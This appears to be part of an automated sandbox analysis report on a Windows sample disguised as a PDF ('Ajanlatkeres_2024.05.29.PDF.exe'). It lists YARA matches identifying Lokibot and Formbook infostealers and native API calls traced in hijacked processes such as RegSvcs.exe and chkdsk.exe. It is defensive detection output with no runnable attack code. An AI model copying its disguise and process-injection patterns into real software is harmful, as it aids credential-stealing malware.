            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
            Source: explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.yelp.com

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: YLc7afPlL4RjCeK.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
            Source: Process Memory Space: RegSvcs.exe PID: 7700, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: chkdsk.exe PID: 7864, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: initial sampleStatic PE information: Filename: Ajanlatkeres_2024.05.29.PDF.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A360 NtCreateFile,19_2_0041A360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A410 NtReadFile,19_2_0041A410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A490 NtClose,19_2_0041A490
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A540 NtAllocateVirtualMemory,19_2_0041A540
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A35D NtCreateFile,19_2_0041A35D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A3B2 NtCreateFile,19_2_0041A3B2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A40A NtReadFile,19_2_0041A40A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A48A NtClose,19_2_0041A48A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_0041A53A NtAllocateVirtualMemory,19_2_0041A53A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42AD0 NtReadFile,LdrInitializeThunk,19_2_00F42AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42BF0 NtAllocateVirtualMemory,LdrInitializeThunk,19_2_00F42BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42B60 NtClose,LdrInitializeThunk,19_2_00F42B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42CA0 NtQueryInformationToken,LdrInitializeThunk,19_2_00F42CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42C70 NtFreeVirtualMemory,LdrInitializeThunk,19_2_00F42C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42DF0 NtQuerySystemInformation,LdrInitializeThunk,19_2_00F42DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42DD0 NtDelayExecution,LdrInitializeThunk,19_2_00F42DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42D30 NtUnmapViewOfSection,LdrInitializeThunk,19_2_00F42D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42D10 NtMapViewOfSection,LdrInitializeThunk,19_2_00F42D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,19_2_00F42EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42E80 NtReadVirtualMemory,LdrInitializeThunk,19_2_00F42E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42FE0 NtCreateFile,LdrInitializeThunk,19_2_00F42FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42FB0 NtResumeThread,LdrInitializeThunk,19_2_00F42FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42F90 NtProtectVirtualMemory,LdrInitializeThunk,19_2_00F42F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42F30 NtCreateSection,LdrInitializeThunk,19_2_00F42F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F44340 NtSetContextThread,19_2_00F44340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F44650 NtSuspendThread,19_2_00F44650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42AF0 NtWriteFile,19_2_00F42AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42AB0 NtWaitForSingleObject,19_2_00F42AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42BE0 NtQueryValueKey,19_2_00F42BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42BA0 NtEnumerateValueKey,19_2_00F42BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42B80 NtQueryInformationFile,19_2_00F42B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42CF0 NtOpenProcess,19_2_00F42CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42CC0 NtQueryVirtualMemory,19_2_00F42CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42C60 NtCreateKey,19_2_00F42C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42C00 NtQueryInformationProcess,19_2_00F42C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42DB0 NtEnumerateKey,19_2_00F42DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42D00 NtSetInformationFile,19_2_00F42D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42EE0 NtQueueApcThread,19_2_00F42EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42E30 NtWriteVirtualMemory,19_2_00F42E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42FA0 NtQuerySection,19_2_00F42FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F42F60 NtCreateProcessEx,19_2_00F42F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F43090 NtSetValueKey,19_2_00F43090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F43010 NtOpenDirectoryObject,19_2_00F43010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F435C0 NtCreateMutant,19_2_00F435C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F439B0 NtGetContextThread,19_2_00F439B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F43D70 NtOpenThread,19_2_00F43D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 19_2_00F43D10 NtOpenProcessToken,19_2_00F43D10
            Source: C:\Windows\explorer.exeCode function: 20_2_101E2E12 NtProtectVirtualMemory,20_2_101E2E12
            Source: C:\Windows\explorer.exeCode function: 20_2_101E1232 NtCreateFile,20_2_101E1232
            Source: C:\Windows\explorer.exeCode function: 20_2_101E2E0A NtProtectVirtualMemory,20_2_101E2E0A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2D10 NtMapViewOfSection,LdrInitializeThunk,21_2_054C2D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2DD0 NtDelayExecution,LdrInitializeThunk,21_2_054C2DD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2DF0 NtQuerySystemInformation,LdrInitializeThunk,21_2_054C2DF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2C60 NtCreateKey,LdrInitializeThunk,21_2_054C2C60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2C70 NtFreeVirtualMemory,LdrInitializeThunk,21_2_054C2C70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2CA0 NtQueryInformationToken,LdrInitializeThunk,21_2_054C2CA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2F30 NtCreateSection,LdrInitializeThunk,21_2_054C2F30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2FE0 NtCreateFile,LdrInitializeThunk,21_2_054C2FE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_054C2EA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2B60 NtClose,LdrInitializeThunk,21_2_054C2B60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2BE0 NtQueryValueKey,LdrInitializeThunk,21_2_054C2BE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_054C2BF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C35C0 NtCreateMutant,LdrInitializeThunk,21_2_054C35C0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C4650 NtSuspendThread,21_2_054C4650
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C4340 NtSetContextThread,21_2_054C4340
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2D00 NtSetInformationFile,21_2_054C2D00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2D30 NtUnmapViewOfSection,21_2_054C2D30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2DB0 NtEnumerateKey,21_2_054C2DB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2C00 NtQueryInformationProcess,21_2_054C2C00
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2CC0 NtQueryVirtualMemory,21_2_054C2CC0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2CF0 NtOpenProcess,21_2_054C2CF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2F60 NtCreateProcessEx,21_2_054C2F60
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2F90 NtProtectVirtualMemory,21_2_054C2F90
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2FA0 NtQuerySection,21_2_054C2FA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2FB0 NtResumeThread,21_2_054C2FB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2E30 NtWriteVirtualMemory,21_2_054C2E30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2EE0 NtQueueApcThread,21_2_054C2EE0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2E80 NtReadVirtualMemory,21_2_054C2E80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2B80 NtQueryInformationFile,21_2_054C2B80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2BA0 NtEnumerateValueKey,21_2_054C2BA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2AD0 NtReadFile,21_2_054C2AD0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2AF0 NtWriteFile,21_2_054C2AF0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C2AB0 NtWaitForSingleObject,21_2_054C2AB0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C3010 NtOpenDirectoryObject,21_2_054C3010
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C3090 NtSetValueKey,21_2_054C3090
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C3D70 NtOpenThread,21_2_054C3D70
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C3D10 NtOpenProcessToken,21_2_054C3D10
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_054C39B0 NtGetContextThread,21_2_054C39B0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A360 NtCreateFile,21_2_00A4A360
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A490 NtClose,21_2_00A4A490
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A410 NtReadFile,21_2_00A4A410
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A540 NtAllocateVirtualMemory,21_2_00A4A540
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A3B2 NtCreateFile,21_2_00A4A3B2
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A35D NtCreateFile,21_2_00A4A35D
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A48A NtClose,21_2_00A4A48A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A40A NtReadFile,21_2_00A4A40A
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_00A4A53A NtAllocateVirtualMemory,21_2_00A4A53A
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0136D3046_2_0136D304
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_072944506_2_07294450
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_072964C06_2_072964C0
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_0729CFF06_2_0729CFF0
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_07294CC06_2_07294CC0
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_072948886_2_07294888
            Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exeCode function: 6_2_072968F86_2_072968F8
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_0161D30414_2_0161D304
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_05576F4014_2_05576F40
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_0557004014_2_05570040
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_0557000614_2_05570006
            Source: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exeCode function: 14_2_05576F1E14_2_05576F1E
